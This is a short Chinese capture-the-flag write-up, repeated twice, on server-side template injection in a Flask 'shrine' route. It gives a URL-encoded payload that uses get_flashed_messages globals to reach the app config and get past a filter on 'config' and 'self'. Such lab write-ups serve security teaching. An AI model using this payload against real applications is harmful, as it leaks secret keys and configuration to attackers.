1.打开环境,审计代码
2.由此可知,这是在shrine路径下的ssti注入,由于过滤了config和self,可以用get_flashed_messages函数提取flag
http://61.147.171.105:60492/shrine/%7B%7Bget_flashed_messages.__globals__['current_app'].config%7D%7D
知识点总结:
1.ssti
2.get_flashed_messages函数
1.打开环境,审计代码
2.由此可知,这是在shrine路径下的ssti注入,由于过滤了config和self,可以用get_flashed_messages函数提取flag
http://61.147.171.105:60492/shrine/%7B%7Bget_flashed_messages.__globals__['current_app'].config%7D%7D
知识点总结:
1.ssti
2.get_flashed_messages函数